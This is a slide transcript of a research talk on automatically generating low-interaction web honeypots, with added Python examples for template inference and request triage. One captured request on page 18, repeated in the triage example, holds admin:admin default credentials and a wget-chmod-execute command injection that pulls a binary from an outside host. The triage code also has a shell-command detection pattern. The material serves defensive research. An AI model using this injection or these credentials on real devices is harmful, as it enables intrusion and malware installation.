Low-Interaction Web Honeypots - owasp.org (PDF transcript)

Page 1
Chameleon: Automatic Generation of Low-Interaction Web Honeypots
Marius Musch (TU Braunschweig), Martin Härterich (SAP SE)
Image by Shobhan Tudu (Own work) [CC BY-SA 4.0], via Wikimedia Commons
Page 2
Agenda
• Honeypots
  • Types
  • Pros and Cons
• Generating Honeypots
  • Approach
  • Demo
  • Results
Page 3
Honeypots
“A security resource whose value lies in being probed, attacked, or compromised” [1]
=> System you want to be attacked
Page 4
High vs. Low Interaction
• High-Interaction Honeypot (HIHP)
  • What are attackers doing after they successfully compromised a system?
  • Identify attackers from within the authenticated userbase
• Low-Interaction Honeypot (LIHP)
  • Are my systems under active attack?
  • Which vulnerabilities are targeted?
  • Profile outside attackers
Today: Focus on low-interaction server web honeypots
Page 5
Motivation for Using Honeypots
“Prevent, Detect, React”
=> Consider this in the context of the complete software development life-cycle
• Gather knowledge and statistics about the frequency of attacks and the primary attack vectors
• Study real attackers' behavior when approaching honeypot systems
• Use knowledge collected in honeypot systems to
  • improve your IDS
  • prioritize processing of code scan results
  • etc.
Page 6
Glastopf
For more examples, watch [3].
Page 7
Pros and Cons
• Advantages
  • Collect valuable data
  • Allow examination of unknown attacks
  • Use minimal resources (only true for low-interaction)
• Disadvantages
  • Only limited vision
  • Manual development and configuration required
  • Detectable via fingerprinting
Can we automatically generate honeypots by observing real applications?
[4]
Page 8
Design Goals
• Universality
  • Independent of the original system’s underlying technology
• Automation
  • Create a copy of the target system without manual effort
• Scalability
  • Run many emulated system instances on one machine
• Deception
  • Approximate indistinguishability from the real system
Page 9
Overview
Real Application -> (HTTP traffic) -> Probing -> Parsing -> (Templates) -> Publishing -> Honeypot
• Probing
  - Crawl content
  - Fuzz inputs
  - Record traffic
• Parsing
  - Static / dynamic
  - Learn semantics
  - Create templates
• Publishing
  - HTTP server
  - Select template
  - Log interactions
Page 10
Probing
• Goals
  • Discover as many resources as possible
  • Identify the range of responses
• Crawling
  • Recursively follow links, download everything multiple times
• Reconnaissance
  • Extract URLs from common files and find directory listings
• Fuzzing
  • Mutate existing data (Method, Query, Headers, Body)
  • Generate values for HTML forms
Page 11
Parsing
• Goals
  • Infer semantics of dynamic values
  • Build templates with placeholders
  • Compare responses with a diff algorithm
• Variables
  • Always changing: random tokens, counters
  • Input-dependent: session tokens, reflections
  • Rarely changing: timestamps
  • Unknown
Page 12
Parsing example
• Response 1 vs. 2 (same cookies)
  • It is now 19:23:445 UTC. To login click <a href= "http://xyz.com/login.php?ssid=wG45">here</a>
• Response 1 vs. 3 (different cookies)
  • It is now 19:23:448 UTC. To login click <a href= "http://xyz.com/login.php?ssid=wG454SH8">here</a>
• Resulting template
  • It is now $_TIME_HH:mm:ss_$ UTC. To login click <a href= "http://$_HOST_$/login.php?ssid=$_SESSION-01_111000-0404-wGHS4458_$">here</a>
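The diff-based classification behind this slide, as an added example that is not Chameleon's own code: responses to the same resource are compared token by token with a diff algorithm, tokens that change even for identical input become an "always changing" placeholder and tokens that change only with different input become an "input-dependent" placeholder. The placeholder names, the tokenizer and the captured responses are constructed for the example.

```python
import re
from difflib import SequenceMatcher

# Word tokens and single non-word characters, so "wG45" and "45" compare as units.
TOKEN = re.compile(r"\w+|\W")

def tokenize(text):
    return TOKEN.findall(text)

def unmatched_positions(ref, other):
    """Indices of tokens in `ref` that the diff cannot align with `other`."""
    sm = SequenceMatcher(None, ref, other, autojunk=False)
    matched = set()
    for i, _j, n in sm.get_matching_blocks():
        matched.update(range(i, i + n))
    return set(range(len(ref))) - matched

def infer_template(reference, same_input, different_input):
    """Classify tokens of `reference` against further captures of the same resource:
    `same_input` fetched with identical cookies/parameters, `different_input` with
    changed ones.  Varies for identical input -> ALWAYS (clock, nonce); varies only
    with the input -> INPUT (session id, reflection); otherwise a literal."""
    ref = tokenize(reference)
    always, input_dep = set(), set()
    for resp in same_input:
        always |= unmatched_positions(ref, tokenize(resp))
    for resp in different_input:
        input_dep |= unmatched_positions(ref, tokenize(resp))
    input_dep -= always  # already explained by the ALWAYS class
    out, i = [], 0
    while i < len(ref):
        kind = "ALWAYS" if i in always else "INPUT" if i in input_dep else None
        if kind is None:
            out.append(ref[i])
            i += 1
            continue
        group = always if kind == "ALWAYS" else input_dep
        while i < len(ref) and i in group:  # merge adjacent variable tokens
            i += 1
        out.append(f"$_{kind}_$")
    return "".join(out)

# Constructed captures modelled on the slide's example (not real traffic).
PAGE = 'It is now 19:23:%s UTC. To login click <a href="http://xyz.com/login.php?ssid=%s">here</a>'
REF = PAGE % ("45", "wG45")
SAME = [PAGE % ("48", "wG45")]   # same cookies: only the clock moved
DIFF = [PAGE % ("51", "4SH8")]   # different cookies: clock and session id moved

if __name__ == "__main__":
    print(infer_template(REF, SAME, DIFF))
```

With only one capture per group the seconds field is the sole "always changing" token; more captures spanning minute boundaries would widen that placeholder to the whole time, which is what the slide's $_TIME_HH:mm:ss_$ expresses.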
Page 13
Publishing
• Goals
  • Find the best template for any given request
  • Generate the response from the template
Page 14
DEMO
Page 15
Evaluation
• Generate honeypots => Automation
  • 5 popular CMSs
• Visual comparison => Compatibility
  • Take screenshot and compare pixels
• Fingerprinting => Deception
  • Worked with all tested tools: Nmap, WhatWeb, lbmap
Page 16
Empirical study
• Also replaced a production WordPress site with Chameleon
Page 17
Captured POST requests
178.32.56.xxx/wordpress/wp-comments-post.php
akismet_comment_nonce=da2ee43abf
author=Glass splashbacks
submit=Post Comment
email=mar***_****[email protected]
comment_post_ID=665
ak_js=991
comment=Terrific work! This is the kind of information that shouyld bbeshared around the web.Disgrace on the seek egines for now not positiohing this post upper! Come on over and visit my web site . Thannkyou =)
url=http://www.glass-outlet.co.uk/products/splashbacks/
comment_parent=0
Page 18
More captured POST requests
35.163.97.xxx/cgi-bin/supervisor/CloudSetup.cgi
connection=close
accept=*/*
content-length=0
authorization=Basic YWRtaW46YWRtaW4=
accept-encoding=gzip, deflate
exefile=wget -O /tmp/Arm1 http://172.247.116.xxx:85/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1
admin:admin (decoded Authorization header)
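Triage logic for captures like the one above, as an added example rather than anything from the talk: it decodes the Basic credentials to spot factory defaults and flags form fields that carry download-and-execute commands, which is the kind of "which vulnerabilities are targeted" signal a low-interaction honeypot exists to produce. The capture is constructed after the slide (the download host is a documentation address), and the default-credential list and field names are assumptions.

```python
import base64
import binascii
import re

# Constructed capture shaped like the slide's CloudSetup.cgi request; the host in
# the download URL is a documentation address, not the one the honeypot saw.
CAPTURE = {
    "path": "/cgi-bin/supervisor/CloudSetup.cgi",
    "authorization": "Basic YWRtaW46YWRtaW4=",
    "exefile": "wget -O /tmp/Arm1 http://203.0.113.5:85/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1",
}

# Factory credentials commonly tried against embedded devices (assumed list).
DEFAULT_CREDS = {("admin", "admin"), ("root", "root"), ("admin", "")}
# Download/execute commands and shell metacharacters that do not belong in a form field.
SHELL_PATTERN = re.compile(r"\b(wget|curl|chmod|tftp|sh)\b|[;|`$]|/tmp/")

def decode_basic_auth(header):
    """Return (user, password) from a Basic Authorization value, or None."""
    scheme, _, blob = header.partition(" ")
    if scheme.lower() != "basic" or not blob:
        return None
    try:
        decoded = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, _, password = decoded.partition(":")
    return user, password

def triage(capture):
    """Flag default credentials and command-style payloads in a captured request."""
    findings = []
    creds = decode_basic_auth(capture.get("authorization", ""))
    if creds is not None:
        tag = "default-credentials" if creds in DEFAULT_CREDS else "basic-auth"
        findings.append((tag, f"{creds[0]}:{creds[1]}"))
    for field, value in capture.items():
        if field not in ("path", "authorization") and SHELL_PATTERN.search(value):
            findings.append(("command-injection", field))
    return findings

if __name__ == "__main__":
    for finding in triage(CAPTURE):
        print(*finding)
```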
Page 19
More captured POST requests
[encoded PHP payload sent in the parameters z0, z2, z3, z4, z9 and login=cmd; omitted]
Page 20
Conclusion
• Chameleon’s approach
  • automates honeypot generation
  • is compatible with existing web servers
  • is highly scalable
  • allows simulating large numbers of systems simultaneously
  • deceives automated tools
Questions?
Page 21
Resources
• [1] Lance Spitzner: “Honeypots: Tracking Hackers”, Addison-Wesley, Boston, 2002. http://www.it-docs.net/ddata/792.pdf
• [2] Marcin Nawrocki et al.: “A Survey on Honeypot Software and Data Analysis”, arXiv preprint arXiv:1608.06249, 2016. https://arxiv.org/pdf/1608.06249.pdf
• [3] Dean Sysman, Gadi Evron, Itamar Sher: “Breaking Honeypots for Fun and Profit”, 32C3, 2015. https://media.ccc.de/v/32c3-7277-breaking_honeypots_for_fun_and_profit
• [4] Iyatiti Mokube, Michele Adams: “Honeypots: Concepts, Approaches, and Challenges”, ACMSE 2007, March 23-24, 2007, Winston-Salem, North Carolina, USA, pp. 321-325. http://dl.acm.org/citation.cfm?id=1233399